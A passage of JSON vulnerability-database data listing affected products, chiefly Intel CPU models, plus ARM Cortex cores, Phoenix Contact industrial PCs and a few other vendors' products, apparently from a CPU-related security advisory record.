        "version": null
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230f"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7555"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2316"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2655le"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4720hq"
      },
      {
        "_id": null,
        "model": "xeon e5 2403",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4000m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2115c"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290f"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2920xm"
      },
      {
        "_id": null,
        "model": "xeon e5 1680 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4980hq"
      },
      {
        "_id": null,
        "model": "bl bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675r"
      },
      {
        "_id": null,
        "model": "xeon e3 1231 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2890_v2"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "550"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3710"
      },
      {
        "_id": null,
        "model": "vl bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "990x"
      },
      {
        "_id": null,
        "model": "xeon e5 1630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330e"
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "480m"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3480"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3460"
      },
      {
        "_id": null,
        "model": "xeon e3 1225",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870_v2"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3538"
      },
      {
        "_id": null,
        "model": "router manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100e"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3700"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1545m_v5"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3530"
      },
      {
        "_id": null,
        "model": "xeon e3 1285l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4220y"
      },
      {
        "_id": null,
        "model": "cortex-a75",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "bl ppc15 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700k"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5603"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870"
      },
      {
        "_id": null,
        "model": "xeon e5 1620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v4"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660um"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5680"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745d"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517ue"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5257u"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570k"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670s"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5590"
      },
      {
        "_id": null,
        "model": "xeon e3 1271 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712hq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4657l_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610me"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "720qm"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697a_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3740qm"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3808"
      },
      {
        "_id": null,
        "model": "xeon e3 1125c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "950"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8153"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770t"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5607"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5520"
      },
      {
        "_id": null,
        "model": "xeon e3 1226 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4410e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2390t"
      },
      {
        "_id": null,
        "model": "bl bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3850"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300"
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1800"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2650l_v4"
      },
      {
        "_id": null,
        "model": "dl ppc18.5m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4120u"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2510e"
      },
      {
        "_id": null,
        "model": "xeon e3 1286l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5690"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v4"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "370m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6167u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4250u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980x"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2665"
      },
      {
        "_id": null,
        "model": "bl ppc12 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "vl2 bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5015u"
      },
      {
        "_id": null,
        "model": "xeon e3 1275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "450m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7545"
      },
      {
        "_id": null,
        "model": "el ppc 1000\\/wt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3820qm"
      },
      {
        "_id": null,
        "model": "xeon e5 2609",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom x5-e3930",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1258l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v3"
      },
      {
        "_id": null,
        "model": "bl ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "760"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3205rk"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6006u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3439y"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2557m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2357m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "840qm"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3308"
      },
      {
        "_id": null,
        "model": "xeon e5 2603 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4500u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700eq"
      },
      {
        "_id": null,
        "model": "xeon e5 1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867l"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620le"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4550u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820eq"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y30"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1281 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7660u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4158u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2880_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860s"
      },
      {
        "_id": null,
        "model": "xeon e-1105c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5539"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2630qm"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2840"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200h"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4400e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850hq"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4205"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3520"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3115c"
      },
      {
        "_id": null,
        "model": "xeon e3 1220 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2435m"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2807"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120me"
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2407 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100t"
      },
      {
        "_id": null,
        "model": "xeon e5 2430l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "bl2 ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3295rk"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "975"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2808"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4765t"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "vl2 bpc 9000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2365m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5650u"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1558l_v5"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100e"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114"
      },
      {
        "_id": null,
        "model": "cortex-a77",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6260u"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2610ue"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2758"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qe"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5502"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5645"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "simatic itc2200",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675c"
      },
      {
        "_id": null,
        "model": "cortex-a72",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5640"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5647"
      },
      {
        "_id": null,
        "model": "xeon bronze 3106",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3689y"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3670"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y31"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3710"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5157u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2620m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4771"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7542"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770d"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2637",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5667"
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860_v2"
      },
      {
        "_id": null,
        "model": "atom z",
